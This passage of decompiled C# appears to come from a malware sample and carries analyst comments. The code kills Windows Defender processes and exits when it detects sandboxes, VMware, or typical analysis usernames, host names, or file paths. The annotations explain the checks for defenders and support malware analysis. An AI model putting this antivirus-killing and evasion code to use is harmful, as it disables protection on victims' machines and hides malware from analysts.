/// shortly after start in an analysis VM may be hitting one of these checks rather than being benign.
/// </remarks>
public static void mofo()
{
Form1.seekit("MSASCui");
Form1.seekit("msmpeng");
Form1.AntiSandboxie();
Form1.IsVmWare();
Form1.AntiThreatExpert();
Form1.checkUsername();
Form1.checkComputername();
}
/// <summary>
/// Calls Kill() on every running process whose name contains the given substring (case-sensitive
/// String.Contains). Failures to kill are swallowed, unlike in the Anti* routines.
/// </summary>
/// <param name="gay1">Substring to look for in each process name.</param>
private static void seekit(string gay1)
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (process.ProcessName.Contains(gay1))
{
try
{
process.Kill();
}
catch (Exception ex)
{
// VB error bookkeeping only; the exception is discarded.
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
checked { ++index; }
}
}
/// <summary>
/// Sandbox check: exits the process (code 0) when Environment.UserName exactly equals one of the
/// hard-coded names below (ordinal, case-sensitive comparison). "User" is listed twice.
/// </summary>
/// <remarks>
/// Defender note: analysis environments using one of these account names will see the sample exit
/// without running its payload; use a non-default account name when detonating.
/// </remarks>
private static void checkUsername()
{
List<string> stringList = new List<string>();
stringList.Add("UserName");
stringList.Add("User");
stringList.Add("honey");
stringList.Add("sandbox");
stringList.Add("currentuser");
stringList.Add("User");
try
{
foreach (string Right in stringList)
{
if (Operators.CompareString(Environment.UserName, Right, false) == 0)
Environment.Exit(0);
}
}
finally
{
// Decompiler artifact: the enumerator local of the foreach above was not recovered.
List<string>.Enumerator enumerator;
enumerator.Dispose();
}
}
/// <summary>
/// Sandbox check: exits the process (code 0) when Environment.MachineName exactly equals one of the
/// hard-coded host names below (ordinal, case-sensitive comparison).
/// </summary>
/// <remarks>
/// Analyst note: the three specific host names are presumably machines of public analysis services
/// known to the author at build time - unverified. The list is a usable static indicator.
/// </remarks>
private static void checkComputername()
{
List<string> stringList = new List<string>();
stringList.Add("ComputerName");
stringList.Add("COMPUTERNAME");
stringList.Add("DELL-D3E62F7E26");
stringList.Add("DWI-9625AC2E275");
stringList.Add("MICHAEL-F156CF7");
try
{
foreach (string Right in stringList)
{
if (Operators.CompareString(Environment.MachineName, Right, false) == 0)
Environment.Exit(0);
}
}
finally
{
// Decompiler artifact: the enumerator local of the foreach above was not recovered.
List<string>.Enumerator enumerator;
enumerator.Dispose();
}
}
/// <summary>
/// Sandbox check: exits the process (code 0) when at least one process named "SbieSvc" is running.
/// </summary>
public static void AntiSandboxie()
{
if (Process.GetProcessesByName("SbieSvc").Length < 1)
return;
Environment.Exit(0);
}
/// <summary>
/// Looks up a top-level window of class "VMDragDetectWndClass" via FindWindowA and either returns
/// or exits the process depending on the result.
/// </summary>
/// <remarks>
/// NOTE(analyst): as decompiled, the method returns when the call result is non-zero and exits when
/// it is zero, i.e. it exits when the window is NOT found. That reads as inverted relative to the
/// method name; confirm against the IL before relying on either interpretation.
/// </remarks>
public static void IsVmWare()
{
string str1 = "VMDragDetectWndClass";
ref string local1 = ref str1;
string str2 = (string) null;
ref string local2 = ref str2;
if (Form1.FindWindow(ref local1, ref local2) != 0L)
return;
Environment.Exit(0);
}
/// <summary>
/// Sandbox check: exits the process (code 0) when the full path of the running executable contains
/// "sample" (case-sensitive).
/// </summary>
/// <remarks>
/// Defender note: rename specimens and avoid "sample" anywhere in the detonation path, otherwise
/// this check ends execution before any payload behaviour is observed.
/// </remarks>
private static void AntiThreatExpert()
{
if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
return;
Environment.Exit(0);
}
}
}